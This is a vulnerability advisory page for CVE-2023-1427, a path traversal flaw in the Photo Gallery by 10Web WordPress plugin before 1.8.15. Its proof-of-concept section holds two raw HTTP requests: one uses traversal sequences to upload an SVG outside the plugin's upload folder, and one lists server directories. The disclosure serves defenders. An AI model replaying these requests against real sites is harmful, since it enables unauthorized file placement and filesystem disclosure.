Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbNguyen Huu DoWPVDB-ID:C8917BA2-4CB3-4B09-8A49-B7C612254946
HistoryMar 27, 2023 - 12:00 a.m.

Photo Gallery by 10Web < 1.8.15 - Admin+ Path Traversal

2023-03-2700:00:00
Nguyen Huu Do
wpscan.com
10
path traversal vulnerability
file upload
high privilege user
image gallery

0.001 Low

EPSS

Percentile

23.5%

JSON

- The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images anywhere in the filesystem via a path traversal vector. - Path Traversal Vulnerabillity also allows listing the entire folder & image file in the system.

PoC

- The below requests will put the svg_to_xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/ POST /wordpress/wp-admin/admin-ajax.php?bwg_nonce=77c06f6311&action;=bwg_upl&dir;=/…//…//…// HTTP/1.1 Host: {host} Content-Length: 2845 Accept: application/json, text/javascript, /; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysAMZOiWPOOk33DG8 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: “Windows” Cookie: {cookie} ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“bwg_nonce” 70ebb31e6c ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“_wp_http_referer” /wordpress/wp-admin/admin-ajax.php?action=addImages&bwg;_width=0&bwg;_height=0&callback;=bwg_add_image&bwg;_nonce=b37a4be11b ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“upload_thumb_width” 500 ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“upload_thumb_height” 500 ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“upload_img_width” 1200 ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“upload_img_height” 1200 ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“task” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“extensions” jpg,jpeg,png,gif,svg ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“callback” bwg_add_image ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“sort_by” date_modified ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“sort_order” desc ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“items_view” thumbs ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“dir” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“file_names” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“file_namesML” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“file_new_name” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“new_dir_name” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“clipboard_task” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“clipboard_files” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“clipboard_src” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“clipboard_dest” ------WebKitFormBoundarysAMZOiWPOOk33DG8 Content-Disposition: form-data; name=“files[]”; filename=“svg_to_xss.svg” Content-Type: image/svg+xml ------WebKitFormBoundarysAMZOiWPOOk33DG8-- - The below requests will list the entire folder & image file in the system. POST /wordpress/wp-admin/admin-ajax.php?action=addImages&bwg;_width=800&bwg;_height=550&callback;=bwg_add_preview_image&bwg;_nonce=b37a4be11b& HTTP/1.1 Host: localhost Content-Length: 62 Content-Type: application/x-www-form-urlencoded Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7C7fee9203d7bfbbc77f90d0a9b9872d0ea8bf7b1ccfa9f43ced48936bbc98b05c; wordpress_test_cookie=WP%20Cookie%20check; pvc_visits[0]=1677949198b1; wp_lang=en_US; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7Cb76a29cd3f196f659d63ecb2bf9c7bb4d158aa0b03f274379bf45e4162030338; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1677909222; tk_ai=%2B8CRtWYwxLjZLIFmx4D5%2FaoH; redux_current_tab=settings; redux_current_tab_get=settings; redux_current_tab_wpml_settings=1; wordpress_apbct_antibot=0050792dac2aebc2f8264b54205dbd73de813c365ef1d1d92377c094cf3bc336; ct_paused_spam_check=0; apbct_check_comments_offset=200; ct_check_users__amount=100; ct_paused_users_check=0; apbct_check_users_offset=0 bwg_nonce=70ebb31e6c&dir;=/…//…//…//…//…//…//

CPENameOperatorVersion
photo-gallerylt1.8.15

Related

cve 1
prion 1
cvelist 1
wpexploit 1
nvd 1
openvas 1
cve
cve
CVE-2023-1427
2023-04-17 13:15:38
prion
prion
Path traversal
2023-04-17 13:15:00
cvelist
cvelist
CVE-2023-1427 Photo Gallery by 10Web < 1.8.15 - Admin+ Path Traversal
2023-04-17 12:17:41
wpexploit
wpexploit
Photo Gallery by 10Web < 1.8.15 - Admin+ Path Traversal
2023-03-27 00:00:00
nvd
nvd
CVE-2023-1427
2023-04-17 13:15:38
openvas
openvas
WordPress Photo Gallery Plugin < 1.8.15 Path Traversal Vulnerability
2023-04-18 00:00:00

0.001 Low

EPSS

Percentile

23.5%

JSON
Related for WPVDB-ID:C8917BA2-4CB3-4B09-8A49-B7C612254946
cve1prion1cvelist1wpexploit1nvd1openvas1